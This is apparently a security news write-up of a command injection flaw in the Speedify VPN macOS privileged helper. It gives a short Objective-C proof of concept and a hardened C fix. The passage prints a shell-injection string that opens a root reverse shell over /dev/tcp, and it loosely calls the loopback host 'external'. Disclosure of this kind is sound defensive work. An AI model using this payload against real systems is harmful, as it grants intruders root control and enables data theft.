A major security flaw in the Speedify VPN application for macOS, tracked as CVE-2025-25364, has exposed millions of users to the risk of complete system compromise.
Researchers at SecureLayer7 discovered the vulnerability in Speedify’s privileged helper tool. It could potentially allow local attackers to execute arbitrary commands as root and take total control of affected systems.
CVE-2025-25364: A Critical Command Injection Vulnerability
The root of the problem lies within the me.connectify.SMJobBlessHelper XPC service—a helper tool that runs with elevated (root) privileges to perform system-level network operations for Speedify.
This service, installed as a privileged daemon via /Library/PrivilegedHelperTools/me.connectify.SMJobBlessHelper, is configured to receive and process commands from the main Speedify app via Apple’s XPC messaging system.
| Aspect | Details |
|---|---|
| CVE ID | CVE-2025-25364 |
| Affected Product | Speedify VPN |
| Affected Version | 15.0.0 (macOS) |
| Patched Version | 15.4.1 |
| Component | me.connectify.SMJobBlessHelper (Privileged Helper Tool at /Library/PrivilegedHelperTools/) |
| Vulnerability Type | Command Injection |
Due to improper input validation, particularly of the cmdPath and cmdBin fields in incoming XPC messages, a local attacker can craft a malicious payload.
These fields are directly embedded into the command execution logic without sanitization, enabling an attacker to inject arbitrary shell commands, which the helper tool then executes with root privileges.
Three key functions are at the heart of this vulnerability:
- XPC Message Handler: Accepts and parses incoming XPC messages, directing those with a "runSpeedify" request to a launch handler with no input validation.
- _handleLaunchSpeedifyMsg: Extracts cmdPath and cmdBin directly from the input and initiates program execution.
- _RunSystemCmd: Constructs a shell command from these fields and calls system() to execute it. This line illustrates the injection risk:
```c
rax = asprintf(&var_38, "codesign -v -R=\"certificate leaf[subject.CN] = \"%s\" and anchor apple generic\" \"%s\"", "…", rcx);
```
A threat actor can set cmdBin or cmdPath to a string such as `"; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo "` to open a root shell connection to an external server: the leading double quote closes the quoted argument in the format string above, and the trailing one reopens it so the rest of the command line still parses.
Researchers released a proof-of-concept (PoC) exploit written in Objective-C, using the XPC APIs to connect to the vulnerable helper and send a crafted payload.
The payload triggers arbitrary code execution as root, such as spawning a reverse shell. Here’s a relevant snippet:
```objectivec
// `message` is the XPC dictionary the PoC sends to the privileged helper
xpc_dictionary_set_string(message, "cmdPath", "/tmp");
// cmdBin closes the quoted argument in the helper's format string, appends a
// command, then reopens the quote so the remainder of the line still parses
const char *injectionPayload = "\"; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo \"";
xpc_dictionary_set_string(message, "cmdBin", injectionPayload);
```
The impact of this flaw is critical: an attacker with local access could gain full root control, modify sensitive files, install persistent malware, and exfiltrate data.
Since most Speedify VPN users rely on the app for privacy, this vulnerability could have undermined the security of a broad user base.
Speedify users are strongly advised to upgrade to version 15.4.1 or above, which addresses the flaw with a complete helper tool rewrite, stricter input validation, and the removal of insecure XPC handling.
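The vendor fix is described as stricter input validation plus a helper rewrite. As an added illustration, not Speedify's code and not the patched helper, the C below shows the two defensive changes a reviewer would look for in a privileged helper handling fields like cmdPath/cmdBin: refusing any path that is not a plain absolute path under an expected prefix, and invoking codesign through an argv array with posix_spawn rather than formatting strings into a system() command line. kAllowedPrefix, team_cn (standing in for the elided first %s on the page) and all function names are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <spawn.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>

extern char **environ;
static const char *kAllowedPrefix = "/Applications/Speedify.app/"; /* assumed location */

/* Hypothetical check for the cmdPath/cmdBin fields: only an absolute path under
 * kAllowedPrefix built from a conservative character set is accepted, so a value
 * like "; bash -i ... ; echo " is refused before it can reach a command line. */
bool is_safe_helper_path(const char *p) {
    if (p == NULL || strncmp(p, kAllowedPrefix, strlen(kAllowedPrefix)) != 0) return false;
    if (strstr(p, "/../") != NULL || strstr(p, "//") != NULL) return false;
    for (const char *c = p; *c != '\0'; c++)
        if (!isalnum((unsigned char)*c) && strchr("/._-", *c) == NULL) return false;
    return true;
}

/* Build argv for `codesign -v -R=<requirement> <binary>` as separate entries. No
 * shell parses these, so quotes or ';' in `binary` cannot close the requirement
 * string or start a second command. Returns argc, or -1 if inputs are rejected. */
int build_codesign_argv(const char *team_cn, const char *binary,
                        char *req, size_t req_len, const char *argv[5]) {
    if (!is_safe_helper_path(binary) || team_cn == NULL || strchr(team_cn, '"')) return -1;
    int n = snprintf(req, req_len,
        "-R=certificate leaf[subject.CN] = \"%s\" and anchor apple generic", team_cn);
    if (n < 0 || (size_t)n >= req_len) return -1;
    argv[0] = "/usr/bin/codesign"; argv[1] = "-v"; argv[2] = req;
    argv[3] = binary;              argv[4] = NULL;
    return 4;
}

/* Run codesign directly with posix_spawn instead of system(); no /bin/sh is
 * involved. Returns codesign's exit status, or -1 on rejection or spawn error. */
int verify_signature(const char *team_cn, const char *binary) {
    char req[512];
    const char *argv[5];
    pid_t pid;
    int status;
    if (build_codesign_argv(team_cn, binary, req, sizeof req, argv) < 0) return -1;
    if (posix_spawn(&pid, argv[0], NULL, NULL, (char *const *)argv, environ) != 0) return -1;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}
```

The same validation should be applied before the value is used anywhere else in the helper, since the page notes both cmdPath and cmdBin reach the command line unsanitized.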
The incident highlights the paramount importance of rigorous input validation in all privileged code.